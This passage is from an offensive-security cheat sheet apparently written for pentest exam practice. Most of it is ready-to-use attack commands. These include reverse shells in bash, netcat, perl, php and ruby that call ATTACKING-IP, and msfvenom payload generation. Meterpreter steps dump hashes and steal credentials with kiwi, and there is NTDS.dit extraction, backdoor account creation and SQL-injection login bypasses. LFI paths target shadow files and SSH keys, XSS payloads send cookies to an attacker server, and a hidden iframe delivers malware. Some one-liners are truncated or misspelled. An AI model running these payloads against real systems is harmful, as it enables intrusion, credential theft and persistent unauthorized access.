``` 1156 | 1157 | # Privilige Escalation ([alot of resources](https://github.com/coreb1t/awesome-pentest-cheat-sheets#privilege-escalation)) 1158 | 1159 | [Linux privilege escalation](https://jok3rsecurity.wordpress.com/linux-privilege-escalation/) 1160 | 1161 | [Linux Privilege Escalation CheatSheet for OSCP - ByteFellow](https://www.bytefellow.com/linux-privilege-escalation-cheatsheet-for-oscp/) 1162 | 1163 | [windows privilege escalation](https://jok3rsecurity.wordpress.com/windows-privilege-escalation/) 1164 | 1165 | [Windows Privilege Escalation Cheatsheet for OSCP - ByteFellow](https://www.bytefellow.com/windows-privilege-escalation-cheatsheet-for-oscp/) 1166 | 
1167 | [C0nd4/OSCP-Priv-Esc](https://github.com/C0nd4/OSCP-Priv-Esc) 1168 | 1169 | ## **Linux:** 1170 | 1171 | Find Binaries that will execute as the owner 1172 | 1173 | ```bash 1174 | find / -perm -u=s -type f 2>/dev/null 1175 | ``` 1176 | 1177 | Find binaries that will execute as the group 1178 | 1179 | ```bash 1180 | find / -perm -g=s -type f 2>/dev/null 1181 | ``` 1182 | 1183 | Find sticky-bit binaries 1184 | 1185 | ```bash 1186 | find / -perm -1000 -type d 2>/dev/null 1187 | ``` 1188 | 1189 | If Python is executable as root 1190 | 1191 | ```bash 1192 | python2.7 -c "import pty;pty.spawn('/bin/sh');" 1193 | ``` 1194 | 1195 | - [LinPeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - Linux Privilege Escalation Awesome Script 1196 | 1197 | ```bash 1198 | #From github 1199 | curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh 1200 | 1201 | #Local network 1202 | sudo python -m SimpleHTTPServer 80 1203 | curl 10.10.10.10/linpeas.sh | sh 1204 | 1205 | #Without curl 1206 | sudo nc -q 5 -lvnp 80 < linpeas.sh 1207 | cat < /dev/tcp/10.10.10.10/80 | sh 1208 | 1209 | #Output to file 1210 | linpeas -a > /dev/shm/linpeas.txt 1211 | less -r /dev/shm/linpeas.txt #Read with colors 1212 | ``` 1213 | 1214 | - [LinEnum](https://github.com/rebootuser/LinEnum) 1215 | 1216 | ```bash 1217 | ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t 1218 | #-k Enter keyword 1219 | #-e Enter export location 1220 | #-t Include thorough (lengthy) tests 1221 | #-s Supply current user password to check sudo perms (INSECURE) 1222 | #-r Enter report name 1223 | #-h Displays this help text 1224 | ``` 1225 | 1226 | [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) 1227 | 1228 | [https://github.com/pentestmonkey/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) 1229 | 1230 | 
## **Windows:** 1231 | 1232 | ```powershell 1233 | #after getting a low privilege shell 1234 | systeminfo 1235 | #copy the result to systeminfo.txt 1236 | python2 ~/tools/Windows-Exploit-Suggester/windows-exploit-suggester.py --update 1237 | python2 ~/tools/Windows-Exploit-Suggester/windows-exploit-suggester.py --systeminfo systeminfo.txt --database [DB].xls 1238 | ``` 1239 | 1240 | [https://github.com/pentestmonkey/windows-privesc-check](https://github.com/pentestmonkey/windows-privesc-check) 1241 | 1242 | 1243 | 1244 | [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) 1245 | 1246 | [https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/) 1247 | 1248 | # Maintain Access 1249 | 1250 | - metasploit 1251 | 1252 | ```bash 1253 | persistence -h 1254 | OR 1255 | exploit/windows/local/persistence 1256 | OR 1257 | net user hacker password123 /add 1258 | ``` 1259 | 1260 | # Wireless Penetration 1261 | 1262 | - airmon-ng, airodump-ng, aircrack-ng - crack wifi networks 1263 | 1264 | ```bash 1265 | iwconfig #show wireless cards, check after connecting the wireless card to the vm machine in options 1266 | airmon-ng check kill #will kill processes that interfere 1267 | airmon-ng start wlan0 #starts monitor mode on the card 1268 | iwconfig #will assure that we are in monitor mode 1269 | airodump-ng wlan0mon #check for available networks, PWR shows how close the network is; the smallest number is the closest 1270 | airodump-ng -c 6 --bssid MAC -w capture wlan0mon #will capture data from the specific MAC address of the network we want, 6 is the channel number of the network 1271 | 1272 | #we are waiting to capture the handshake, it will be written in the header 1273 | #we can make it faster by DEAUTH which means kicking a connected user and while he re-auths we will capture the handshake 1274 | #in 
a new terminal: 1275 | aireplay-ng -0 1 -a MAC_OF_THE_NETWORK -c MAC_OF_THE_STATION_CONNECTED wlan0mon 1276 | ls capture* 1277 | aircrack-ng -w wordlist.txt -b MAC_OF_THE_NETWORK CAPTUREFILE #could be done also with hashcat 1278 | #phone numbers are very common as a password 1279 | 1280 | ``` 1281 | 1282 | # **Shells & Reverse Shells** 1283 | 1284 | ## **SUID C Shells** 1285 | 1286 | - bin/bash: 1287 | 1288 | ``` 1289 | int main(void){ 1290 | 1291 | setresuid(0, 0, 0); 1292 | 1293 | system("/bin/bash"); 1294 | 1295 | } 1296 | ``` 1297 | 1298 | - bin/sh: 1299 | 1300 | ``` 1301 | int main(void){ 1302 | 1303 | setresuid(0, 0, 0); 1304 | 1305 | system("/bin/sh"); 1306 | 1307 | } 1308 | ``` 1309 | 1310 | ### **TTY Shell:** 1311 | 1312 | ```bash 1313 | python -c 'import pty;pty.spawn("/bin/bash")' #Python TTY Shell Trick 1314 | ``` 1315 | 1316 | ```bash 1317 | echo os.system('/bin/bash') 1318 | ``` 1319 | 1320 | ```bash 1321 | /bin/sh –i #Spawn Interactive sh shell 1322 | ``` 1323 | 1324 | ```bash 1325 | execute('/bin/sh') 1326 | ``` 1327 | 1328 | - LUA 1329 | 1330 | ```bash 1331 | !sh 1332 | ``` 1333 | 1334 | - Privilege Escalation via nmap 1335 | 1336 | ```bash 1337 | :!bash 1338 | ``` 1339 | 1340 | - Privilege escalation via vi 1341 | 1342 | ### Fully Interactive TTY 1343 | 1344 | ``` 1345 | In reverse shell 1346 | python -c 'import pty; pty.spawn("/bin/bash")' 1347 | Ctrl-Z 1348 | In Attacker console 1349 | stty -a 1350 | stty raw -echo 1351 | fg 1352 | In reverse shell 1353 | reset 1354 | export SHELL=bash 1355 | export TERM=xterm-256color 1356 | stty rows <num> columns <cols> 1357 | ``` 1358 | 1359 | ### **Spawn Ruby Shell** 1360 | 1361 | ```bash 1362 | exec "/bin/sh" 1363 | ``` 1364 | 1365 | ```bash 1366 | ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 1367 | ``` 1368 | 1369 | ### **Netcat** 1370 | 1371 | ```bash 1372 | nc -e /bin/sh ATTACKING-IP 80 1373 | ``` 1374 | 1375 | ```bash 1376 | /bin/sh | nc ATTACKING-IP 80 
1377 | ``` 1378 | 1379 | ```bash 1380 | rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p 1381 | ``` 1382 | 1383 | ### **Telnet Reverse Shell** 1384 | 1385 | ```bash 1386 | rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p 1387 | ``` 1388 | 1389 | ```bash 1390 | telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443 1391 | ``` 1392 | 1393 | ### **PHP** 1394 | 1395 | ```bash 1396 | php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' 1397 | ``` 1398 | 1399 | - (Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6) 1400 | 1401 | ### **Bash** 1402 | 1403 | ```bash 1404 | exec /bin/bash 0&0 2>&0 1405 | ``` 1406 | 1407 | ```bash 1408 | 0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196 1409 | ``` 1410 | 1411 | ```bash 1412 | exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done 1413 | ``` 1414 | 1415 | ```bash 1416 | # or: while read line 0<&5; do $line 2>&5 >&5; done 1417 | ``` 1418 | 1419 | ```bash 1420 | bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 1421 | ``` 1422 | 1423 | ### **Perl** 1424 | 1425 | ```bash 1426 | exec "/bin/sh"; 1427 | ``` 1428 | 1429 | ```bash 1430 | perl —e 'exec "/bin/sh";' 1431 | ``` 1432 | 1433 | ```bash 1434 | perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1435 | ``` 1436 | 1437 | ```bash 1438 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 1439 | ``` 1440 | 1441 | - Windows 1442 | 1443 | ```bash 1444 | perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1445 | ``` 1446 | 1447 | - 1448 | 1449 | # Meterpreter (Metasploit) 
([cheet sheet](https://www.tunnelsup.com/metasploit-cheat-sheet/)) 1450 | 1451 | ### **Windows reverse meterpreter payload** 1452 | 1453 | ```bash 1454 | set payload windows/meterpreter/reverse_tcp 1455 | ``` 1456 | 1457 | - Windows reverse tcp payload 1458 | 1459 | ### **Windows VNC Meterpreter payload** 1460 | 1461 | ```bash 1462 | set payload windows/vncinject/reverse_tcpf 1463 | ``` 1464 | 1465 | - Meterpreter Windows VNC Payload 1466 | 1467 | ```bash 1468 | set ViewOnly false 1469 | ``` 1470 | 1471 | ### **Linux Reverse Meterpreter payload** 1472 | 1473 | ```bash 1474 | set payload linux/meterpreter/reverse_tcp 1475 | ``` 1476 | 1477 | - Meterpreter Linux Reverse Payload 1478 | 1479 | ### **Meterpreter Cheat Sheet** 1480 | 1481 | ```bash 1482 | upload file c:\\windows 1483 | ``` 1484 | 1485 | - Meterpreter upload file to Windows target 1486 | 1487 | ```bash 1488 | download c:\\windows\\repair\\sam /tmp 1489 | ``` 1490 | 1491 | - Meterpreter download file from Windows target 1492 | 1493 | ```bash 1494 | download c:\\windows\\repair\\sam /tmp 1495 | ``` 1496 | 1497 | - Meterpreter download file from Windows target 1498 | 1499 | ```bash 1500 | execute -f c:\\windows\temp\exploit.exe 1501 | ``` 1502 | 1503 | - Meterpreter run .exe on target – handy for executing uploaded exploits 1504 | 1505 | ```bash 1506 | execute -f cmd -c 1507 | ``` 1508 | 1509 | - Creates new channel with cmd shell 1510 | 1511 | ```bash 1512 | ps 1513 | ``` 1514 | 1515 | - Meterpreter show processes 1516 | 1517 | ```bash 1518 | shell 1519 | ``` 1520 | 1521 | - Meterpreter get shell on the target 1522 | 1523 | ```bash 1524 | getsystem 1525 | ``` 1526 | 1527 | - Meterpreter attempts priviledge escalation the target 1528 | 1529 | ```bash 1530 | hashdump 1531 | ``` 1532 | 1533 | - Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first) 1534 | 1535 | ```bash 1536 | portfwd add –l 3389 –p 3389 –r target 1537 | ``` 1538 | 1539 | - 
Meterpreter create port forward to target machine 1540 | 1541 | ```bash 1542 | portfwd delete -l 3389 -p 3389 -r target 1543 | ``` 1544 | 1545 | - Meterpreter delete port forward 1546 | 1547 | ```bash 1548 | use exploit/windows/local/bypassuac 1549 | ``` 1550 | 1551 | - Bypass UAC on Windows 7 + Set target + arch, x86/64 1552 | 1553 | ```bash 1554 | use auxiliary/scanner/http/dir_scanner 1555 | ``` 1556 | 1557 | - Metasploit HTTP directory scanner 1558 | 1559 | ```bash 1560 | use auxiliary/scanner/http/jboss_vulnscan 1561 | ``` 1562 | 1563 | - Metasploit JBOSS vulnerability scanner 1564 | 1565 | ```bash 1566 | use auxiliary/scanner/mssql/mssql_login 1567 | ``` 1568 | 1569 | - Metasploit MSSQL Credential Scanner 1570 | 1571 | ```bash 1572 | use auxiliary/scanner/mysql/mysql_version 1573 | ``` 1574 | 1575 | - Metasploit MySQL Version Scanner 1576 | 1577 | ```bash 1578 | use auxiliary/scanner/oracle/oracle_login 1579 | ``` 1580 | 1581 | - Metasploit Oracle Login Module 1582 | 1583 | ```bash 1584 | use exploit/multi/script/web_delivery 1585 | ``` 1586 | 1587 | - Metasploit powershell payload delivery module 1588 | 1589 | ```bash 1590 | post/windows/manage/powershell/exec_powershell 1591 | ``` 1592 | 1593 | - Metasploit upload and run powershell script through a session 1594 | 1595 | ```bash 1596 | use exploit/multi/http/jboss_maindeployer 1597 | ``` 1598 | 1599 | - Metasploit JBOSS deploy 1600 | 1601 | ```bash 1602 | use exploit/windows/mssql/mssql_payload 1603 | ``` 1604 | 1605 | - Metasploit MSSQL payload 1606 | 1607 | ```bash 1608 | run post/windows/gather/win_privs 1609 | ``` 1610 | 1611 | - Metasploit show privileges of current user 1612 | 1613 | ```bash 1614 | use post/windows/gather/credentials/gpp 1615 | ``` 1616 | 1617 | - Metasploit grab GPP saved passwords 1618 | 1619 | ```bash 1620 | load kiwi 1621 | ``` 1622 | 1623 | ```bash 1624 | creds_all 1625 | ``` 1626 | 1627 | - Metasploit load Mimikatz/kiwi and get creds 1628 | 1629 | ```bash 1630 | run 
post/windows/gather/local_admin_search_enum 1631 | ``` 1632 | 1633 | - Idenitfy other machines that the supplied domain user has administrative access to 1634 | 1635 | ```bash 1636 | set AUTORUNSCRIPT post/windows/manage/migrate 1637 | ``` 1638 | 1639 | ### **Meterpreter Payloads** 1640 | 1641 | ```bash 1642 | msfvenom –l 1643 | ``` 1644 | 1645 | - List options 1646 | 1647 | ### **Binaries** 1648 | 1649 | ```bash 1650 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 1651 | ``` 1652 | 1653 | ```bash 1654 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe 1655 | ``` 1656 | 1657 | ```bash 1658 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho 1659 | ``` 1660 | 1661 | ### **Web Payloads** 1662 | 1663 | ```bash 1664 | msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php 1665 | ``` 1666 | 1667 | - PHP 1668 | 1669 | ```bash 1670 | set payload php/meterpreter/reverse_tcp 1671 | ``` 1672 | 1673 | - Listener 1674 | 1675 | ```bash 1676 | cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php 1677 | ``` 1678 | 1679 | - PHP 1680 | 1681 | ```bash 1682 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 1683 | ``` 1684 | 1685 | - ASP 1686 | 1687 | ```bash 1688 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 1689 | ``` 1690 | 1691 | - JSP 1692 | 1693 | ```bash 1694 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 1695 | ``` 1696 | 1697 | - WAR 1698 | 1699 | ### **Scripting Payloads** 1700 | 1701 | ```bash 1702 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 1703 | ``` 1704 | 1705 | - Python 1706 | 1707 | ```bash 1708 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 1709 | ``` 1710 | 1711 | - Bash 1712 | 1713 | ```bash 1714 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 1715 | ``` 1716 | 1717 | - Perl 1718 
| 1719 | ### **Shellcode** 1720 | 1721 | For all shellcode, see `msfvenom --help-formats` for the valid parameters. 1722 | Msfvenom will output code that can be cut and 1723 | pasted into this language for your exploits. 1724 | 1725 | ```bash 1726 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 1727 | ``` 1728 | 1729 | ```bash 1730 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 1731 | ``` 1732 | 1733 | ```bash 1734 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 1735 | ``` 1736 | 1737 | ### **Handlers** 1738 | 1739 | Metasploit handlers are a quick way to set Metasploit up to 1740 | receive your incoming shells. Handlers should be in 1741 | the following format. 1742 | 1743 | ``` 1744 | exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z 1745 | ``` 1746 | 1747 | An example is: 1748 | 1749 | ``` 1750 | msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f > exploit.extension 1751 | ``` 1752 | 1753 | # **Powershell** 1754 | 1755 | **Execution Bypass** 1756 | 1757 | ```bash 1758 | Set-ExecutionPolicy Unrestricted 1759 | ./file.ps1 1760 | ``` 1761 | 1762 | ```bash 1763 | Import-Module script.psm1 1764 | Invoke-FunctionThatIsIntheModule 1765 | ``` 1766 | 1767 | ```bash 1768 | iex(new-object system.net.webclient).downloadstring(“file:///C:\examplefile.ps1”) 1769 | ``` 1770 | 1771 | **Powershell.exe blocked** 1772 | 1773 | ```bash 1774 | Use ‘not powershell’ [https://github.com/Ben0xA/nps](https://github.com/Ben0xA/nps) 1775 | ``` 1776 | 1777 | **Persistence** 1778 | 1779 | ```bash 1780 | net user username "password" /ADD 1781 | ``` 1782 | 1783 | ```bash 1784 | net group "Domain Admins" %username% /DOMAIN /ADD 1785 | ``` 1786 | 1787 | **Gather NTDS.dit file** 1788 | 1789 | ```bash 1790 | ntdsutil 1791 | ``` 1792 | 1793 | ```bash 1794 | activate instance ntds 1795 | ``` 1796 | 1797 | ```bash 1798 | ifm 1799 | ``` 1800 
| 1801 | ```bash 1802 | create full C:\ntdsutil 1803 | ``` 1804 | 1805 | ```bash 1806 | quit 1807 | ``` 1808 | 1809 | ```bash 1810 | quit 1811 | ``` 1812 | 1813 | # **SQLInjections** 1814 | 1815 | ### Common **Injections for Login Forms:** 1816 | 1817 | ```bash 1818 | admin' -- 1819 | ``` 1820 | 1821 | ```bash 1822 | admin' # 1823 | ``` 1824 | 1825 | ```bash 1826 | admin'/* 1827 | ``` 1828 | 1829 | ```bash 1830 | ' or 1=1-- 1831 | ``` 1832 | 1833 | ```bash 1834 | ' or 1=1# 1835 | ``` 1836 | 1837 | ```bash 1838 | ' or 1=1/* 1839 | ``` 1840 | 1841 | ```bash 1842 | ') or '1'='1-- 1843 | ``` 1844 | 1845 | ```bash 1846 | ') or ('1'='1— 1847 | ``` 1848 | 1849 | ## Uploading Files to Target Machine 1850 | 1851 | TFTP 1852 | 1853 | ```bash 1854 | #TFTP Linux: cat /etc/default/atftpd to find out file serving location; default in kali /srv/tftp 1855 | service atftpd start 1856 | 1857 | # Windows 1858 | tftp -i $ATTACKER get /download/location/file /save/location/file 1859 | ``` 1860 | 1861 | FTP 1862 | 1863 | ```bash 1864 | # Linux: set up ftp server with anonymous logon access; 1865 | twistd -n ftp -p 21 -r /file/to/serve 1866 | 1867 | # Windows shell: read FTP commands from ftp-commands.txt non-interactively; 1868 | echo open $ATTACKER>ftp-commands.txt 1869 | echo anonymous>>ftp-commands.txt 1870 | echo whatever>>ftp-commands.txt 1871 | echo binary>>ftp-commands.txt 1872 | echo get file.exe>>ftp-commands.txt 1873 | echo bye>>ftp-commands.txt 1874 | ftp -s:ftp-commands.txt 1875 | 1876 | # Or just a one-liner 1877 | (echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd 1878 | ``` 1879 | 1880 | CertUtil (download file from windows) 1881 | 1882 | ```bash 1883 | certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe 1884 | me 1885 | ``` 1886 | 1887 | PHP 1888 | 1889 | ```bash 1890 | <?php file_put_contents("/var/tmp/shell.php", file_get_contents("http://10.11.0.245/shell.php")); 
?> 1891 | ``` 1892 | 1893 | Python 1894 | 1895 | ```bash 1896 | python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')" 1897 | ``` 1898 | 1899 | HTTP: Powershell 1900 | 1901 | ```bash 1902 | python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')" 1903 | ``` 1904 | 1905 | HTTP: Linux 1906 | 1907 | ```bash 1908 | wget http://$ATTACKER/file 1909 | curl http://$ATTACKER/file -O 1910 | scp ~/file/file.bin user@$TARGET:tmp/backdoor.py 1911 | ``` 1912 | 1913 | NetCat 1914 | 1915 | ```bash 1916 | # Attacker 1917 | nc -l -p 4444 < /tool/file.exe 1918 | 1919 | # Victim 1920 | nc $ATTACKER 4444 > file.exe 1921 | ``` 1922 | 1923 | # Web Application 1924 | 1925 | ## LFI (Local File Inclusion) 1926 | 1927 | if we found an LFI, we can check each of those paths, 1928 | 1929 | we can use burpsuite intruder to see all 1930 | Useful LFI files 1931 | Linux 1932 | /etc/passwd 1933 | /etc/shadow 1934 | /etc/issue 1935 | /etc/group 1936 | /etc/hostname 1937 | /etc/ssh/ssh_config 1938 | /etc/ssh/sshd_config 1939 | /root/.ssh/id_rsa 1940 | /root/.ssh/authorized_keys 1941 | /home/user/.ssh/authorized_keys 1942 | /home/user/.ssh/id_rsa 1943 | /proc/[0-9]*/fd/[0-9]* 1944 | /proc/mounts 1945 | /home/$USER/.bash_history 1946 | /home/$USER/.ssh/id_rsa 1947 | /var/run/secrets/kubernetes.io/serviceaccount 1948 | /var/lib/mlocate/mlocate.db 1949 | /var/lib/mlocate.db 1950 | Apache 1951 | /etc/apache2/apache2.conf 1952 | /usr/local/etc/apache2/httpd.conf 1953 | /etc/httpd/conf/httpd.conf 1954 | Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log 1955 | Debian/Ubuntu -> /var/log/apache2/access.log 1956 | FreeBSD -> /var/log/httpd-access.log 1957 | /var/log/apache/access.log 1958 | /var/log/apache/error.log 1959 | /var/log/apache2/access.log 1960 | /var/log/apache/error.log 1961 | MySQL 1962 | /var/lib/mysql/mysql/user.frm 1963 | /var/lib/mysql/mysql/user.MYD 1964 | /var/lib/mysql/mysql/user.MYI 1965 
| Windows 1966 | /boot.ini 1967 | /autoexec.bat 1968 | /windows/system32/drivers/etc/hosts 1969 | /windows/repair/SAM 1970 | /windows/panther/unattended.xml 1971 | /windows/panther/unattend/unattended.xml 1972 | /windows/system32/license.rtf 1973 | /windows/system32/eula.txt 1974 | 1975 | Situation 1976 | 1977 | ``` 1978 | http://<target>/index.php?parameter=value 1979 | 1980 | ``` 1981 | 1982 | ### How to Test 1983 | 1984 | ``` 1985 | http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=index 1986 | 1987 | ``` 1988 | 1989 | ``` 1990 | http://<target>/script.php?page=../../../../../../../../etc/passwd 1991 | OR 1992 | http://<target>/script.php?page=..//..//..//..//..//..//../etc/passwd 1993 | OR 1994 | curl http://<target>/script.php?page=..//..//..//..//..//..//../etc/passwd 1995 | 1996 | ``` 1997 | 1998 | ``` 1999 | http://<target>/script.php?page=../../../../../../../../boot.ini 2000 | 2001 | ``` 2002 | 2003 | ### LFI Payloads 2004 | 2005 | - [Payload All the Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion/Intruders) 2006 | - [Seclist LFI Intruder](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) 2007 | 2008 | ## XSS 2009 | 2010 | ### Reflected 2011 | 2012 | ### Simple test 2013 | 2014 | This is a simple test to see what happens; it is not proof that the field is vulnerable to XSS 2015 | 2016 | <plaintext> 2017 | 2018 | ### Simple XSS test 2019 | 2020 | <script>alert('Found')</script> 2021 | 2022 | "><script>alert(Found)</script>"> 2023 | 2024 | <script>alert(String.fromCharCode(88,83,83))</script> 2025 | 2026 | ### Bypass filter of tag script 2027 | 2028 | `" onload="alert(String.fromCharCode(88,83,83))` 2029 | 2030 | " onload="alert('XSS') 2031 | 2032 | bla is not a valid image, so this causes an error 2033 | 2034 | <img src='bla' onerror=alert("XSS")> 2035 | 2036 | ### Persistent 2037 | 2038 | >document.body.innerHTML="<style>body{visibility:hidden;}</style><div 
style=visibility:visible;><h1>HACKED!</h1></div>"; 2039 | 2040 | ### PHP collector 2041 | 2042 | `> cookie.txtchmod 777 cookie.txt` 2043 | 2044 | edit a php page like colector.php as follows: 2045 | 2046 | <?php $cookie=GET['cookie']; $useragent=$_SERVER['HTTP_USER_AGENT']; $file=fopen('cookie.txt', 'a'); fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n"); fclose($file); 2047 | ?> 2048 | 2049 | Script to put in page: 2050 | 2051 | <scritp>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;</script> 2052 | 2053 | ### Malware Downloader via XSS 2054 | 2055 | <iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe> 2056 | 2057 | ### How to play Mario with XSS 2058 | 2059 | <iframe src="https://jcw87.github.io/c2-smb1/" width="100%" height="600"></iframe> 2060 | 2061 | <input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2l0aHViLmlvL2MyLXNtYjEvIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI2MDAiPjwvaWZyYW1lPg==')" autofocus> 2062 | 2063 | ### XSS payloads 2064 | 2065 | - [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection) 2066 | - [Seclist XSS](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/XSS) 2067 | 2068 | ## MySql Cheat Sheet 2069 | 2070 | ```bash 2071 | mysql -u [username] -p; #connect, you will be asked for password 2072 | SHOW DATABASES; 2073 | use DB_NAME; 2074 | SHOW TABLES; 2075 | select * from TABLE; 2076 | ``` 2077 | 2078 | [MySQL cheatsheet](https://devhints.io/mysql) 2079 | 2080 | [MySQL Cheat Sheet](https://www.mysqltutorial.org/mysql-cheat-sheet.aspx) 2081 | 2082 | # Misc 2083 | 2084 | ## Linux file permissions 2085 | 2086 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%202.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%202.png) 2087 | 2088 | ## Linux Cheat Sheet 2089 | 2090 | 
![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%203.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%203.png) 2091 | 2092 | [](https://itblogr.com/wp-content/uploads/2020/04/The-Concise-Blue-Team-cheat-Sheets.pdf?fbclid=IwAR2lG6uxX3cMwu4G80Vwl_ZxpddwEPDqsyXb27yw5xjMOnAB1zX9ZEjDl78) 2093 | 2094 | [Hacking Cheat Sheets](https://cheatography.com/tag/hacking/) 2095 | 2096 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%204.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%204.png) 2097 | 2098 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%205.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%205.png) 2099 | 2100 | vi cheat sheet 2101 | 2102 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%206.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%206.png) 2103 | 2104 | ## find cheat sheet 2105 | 2106 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%207.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%207.png) 2107 | 2108 | ## Simple Local Web Servers 2109 | 2110 | Python local web server command, handy for serving up shells and exploits on an attacking machine. 
2111 | 2112 | ```bash 2113 | python -m SimpleHTTPServer 80 2114 | python3 -m http.server 2115 | python -m pyftpdlib -p 21 #start a local ftp server with anonymous:anonymouscer 2116 | 2117 | updog 2118 | 2119 | ruby -rwebrick -e "WEBrick::HTTPServer.new 2120 | (:Port => 80, :DocumentRoot => Dir.pwd).start" 2121 | 2122 | php -S 0.0.0.0:80 2123 | ``` 2124 | 2125 | ## Hash Examples 2126 | 2127 | Likely just use **hash-identifier** for this but here are some example hashes: 2128 | 2129 | [Untitled](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%20Database%202c8912d8c7b747859491d93a41439662.csv) 2130 | 2131 | # Text Manipulation 2132 | 2133 | ## [awk](https://www.howtogeek.com/562941/how-to-use-the-awk-command-on-linux/) - command-line text manipulation dynamo 2134 | 2135 | ```bash 2136 | awk -F: '{print $1,$6}' /etc/passwd 2137 | $0: Represents the entire line of text. 2138 | $1: Represents the first field. 2139 | $2: Represents the second field. 2140 | $7: Represents the seventh field. 2141 | $45: Represents the 45th field. 2142 | $NF: Stands for “number of fields,” and represents the last field. 
